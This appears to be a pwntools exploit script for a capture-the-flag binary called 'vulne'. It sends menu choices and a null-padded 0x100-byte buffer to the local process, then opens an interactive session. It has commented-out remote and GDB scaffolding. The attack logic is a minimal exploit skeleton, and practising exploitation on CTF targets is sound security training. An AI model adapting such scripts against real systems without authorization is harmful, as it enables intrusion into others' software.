#!/usr/bin/env python3
from pwn import *
import warnings
warnings.filterwarnings("ignore")
exe = ELF("./vulne")
# context.log_level='debug'
# p = remote("addr", 1337)
p = process([exe.path])
def GDB():
    context.terminal = ["foot"]
    gdb.attach(p, gdbscript="""

               """)
    # p = gdb.debug([exe.path],"""
    #
    #                 """)

sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
# GDB()
sla(">", "5")
sla(":", p32(0).ljust(0x100, b"\0"))
sla(">", "7")










p.interactive()
# good luck pwning :)

